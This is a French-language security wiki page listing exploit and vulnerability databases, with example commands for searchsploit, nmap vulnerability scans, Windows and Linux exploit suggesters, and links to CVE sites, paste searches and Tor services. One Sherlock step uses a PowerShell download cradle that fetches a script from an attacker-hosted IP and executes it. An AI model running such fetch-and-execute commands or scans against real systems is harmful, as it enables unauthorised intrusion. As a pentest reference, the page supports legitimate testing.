FIXME **Le PAD pour proposer une amélioration à cette page :** https://pad.zenk-security.com/p/merci


====== [Base de donnée d'Exploits et Vulnerabilités ] ======

=============================


**offline :**

  * un outil comme searchsploit mais qui cherche sur exploit-db et https://github.com/nomi-sec/PoC-in-GitHub : https://github.com/usdAG/search_vulns 
  * SearchSploit https://www.exploit-db.com/documentation/Offsec-SearchSploit.pdf
  * -> git clone https://github.com/offensive-security/exploit-database.git
  * -> apt update && apt -y install exploitdb
  * -> searchsploit -u #update
  * -> searchsploit "linux Kernel"--exclude="(PoC)|/dos/" #Example
  * -> searchsploit apache mod_ssl #Other example
  * -> searchsploit -m 7618 #Paste the exploit in current directory
  * -> searchsploit -p 7618[.c] #Show complete path
  * -> searchsploit -x 7618[.c] #Open vi to inspect the exploit
  * -> searchsploit --nmap file.xml #Search vulns inside an nmap xml result
  * -> searchsploit openssh 3 --color| grep -i 'openssh 3.' #This example filter the result 
  * -> nmap --min-rate 200 -p- 10.10.10.93 -oX resultat.xml
  * -> searchsploit -x --nmap resultat.xml



  * MSF-Search
  * -> msf> search platform:windows port:135 target:XP type:exploit

  * Nmap vulners
  * -> nmap --script nmap-vulners -sV 127.0.0.1 -p 443


  * Nmap vuln
  * -> nmap -Pn -n -sV -oN vulnnmapoutput.txt --script vuln 127.0.0.1

  * Sherlock , PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities.
  * -> https://github.com/rasta-mouse/Sherlock
  * -> powershell "IEX(New-Object Net.Webclient).downloadString('http://10.10.14.13:3001/Sherlock.ps1'); Find-AllVulns"
  * ->  attend quelque minutes


  * Windows Exploit Suggester 
  * -> git clone https://github.com/AonCyberLabs/Windows-Exploit-Suggester
  * -> pip install xlrd --upgrade
  * -> apt install python3-xlrd
  * -> ./windows-exploit-suggester.py --update
  * -> python windows-exploit-suggester.py --database 2020-07-27-mssb.xls --systeminfo sysinfo.txt



  * Windows Exploit Suggester - Next Generation (WES-NG)
  * -> git clone https://github.com/bitsadmin/wesng.git
  * -> python wes.py --update
  * -> python wes.py sysinfoTarget.txt 
  * List only vulnerabilities with exploits, excluding IE, Edge and Flash
  * -> wes.py systeminfo.txt --exploits-only --hide "Internet Explorer" Edge Flash
  * -> wes.py systeminfo.txt -e --hide "Internet Explorer" Edge Flash
  * Only show vulnerabilities of a certain impact
  * -> wes.py systeminfo.txt - -impact "Remote Code Execution" 
  * -> wes.py systeminfo.txt -i "Remote Code Execution"
  * -> wes.py systeminfo.txt -i "Elevation of Privilege"
  * Only show vulnerabilities of a certain severity
  * -> wes.py systeminfo.txt --severity critical important
  * -> wes.py systeminfo.txt -s critical


  * Linux Exploit Suggester 2
  * -> git clone https://github.com/jondonas/linux-exploit-suggester-2

  * LES: Linux privilege escalation auditing tool
  * -> git clone https://github.com/mzet-/linux-exploit-suggester



**online :**

  * https://cn-sec.com/?s=CVE
  * https://snyk.io/vuln
  * http://www.securityfocus.com/
  * https://www.cvedetails.com/
  * https://www.exploit-db.com/
  * https://www.exploit-db.com/google-hacking-database/
  * google
  * -> firefox --search "Microsoft Edge site:exploit-db.com"
  * -> firefox --search "Microsoft Edge site:exploit-db.com" inurl:exploits intext:remote intitle:Browser
  * https://srcincite.io/exploits/
  * https://www.exploitalert.com/
  * https://github.com/qazbnm456/awesome-cve-poc 
  * https://github.com/yeahhub/awesome-cve-poc
  * https://vulners.com/
  * https://sploitus.com/
  * -> https://github.com/rejoinder/sploitus-search
  * -> https://github.com/0xricksanchez/sploitGET
  * -> https://github.com/si9int/sploitus.py
  * https://www.github.com/ 
  * pastebin.com
  * -> http://pastehits.blogspot.com/2013/03/pastebincom-custom-search.html 
  * -> https://pastebeen.com  
  * -> https://psbdmp.cc/ https://psbdmp.ws/ 
  * Tor 
  * -> http://xmh57jrzrnw6insl.onion/
  * -> http://hss3uro2hsxfogfq.onion/
  * -> http://gjobqjj7wyczbqie.onion/
  * -> https://ahmia.fi/
  * https://threatpost.com/
  * https://www.deepdotweb.com/
  * https://packetstormsecurity.com/
  * http://routerpwn.com/
  * https://www.rapid7.com/db/
  * http://0day.today/ **non recommandé** [[https://forum.zenk-security.com/showthread.php?tid=2590|thread sur le forum]]
  * https://cve.mitre.org/cve/
  * http://www.exploitalert.com
  * http://www.vulnerability-lab.com
  * https://www.rapid7.com/db/
  * http://it.0day.today
  * https://nvd.nist.gov
  * http://osvdb.org
  * https://cxsecurity.com
  * https://www.kb.cert.org/vuls
  * https://secunia.com/community/advisories/search/
  * http://lwn.net/Vulnerabilities/
  * https://www.owasp.org/index.php/Category:Vulnerability
  * http://xforce.iss.net
  * http://www.us-cert.gov/cas/techalerts/
  * http://www.securiteam.com
  * http://lab.mediaservice.net
  * http://www.intelligentexploit.com
  * http://osvdb.org/
  * https://wpvulndb.com/ 
  * http://repwn.com/wiki.html
  * https://www.vulncode-db.com/ Vulncode-DB - is a database for vulnerabilities and their corresponding source code if available.
  * https://cveapi.com/ cveapi - free API for CVE data.
  * http://securityvulns.com/
  * http://insecure.org/sploits_all.html
  * http://zerodayinitiative.com/advisories/published/
  * http://nmrc.org/pub/index.html
  * http://oval.mitre.org


**Finding more information regarding the exploit **
  * http://www.cvedetails.com
  * http://packetstormsecurity.org/files/cve/[CVE]
  * http://cve.mitre.org/cgi-bin/cvename.cgi?name=[CVE]
  * http://www.vulnview.com/cve-details.php?cvename=[CVE]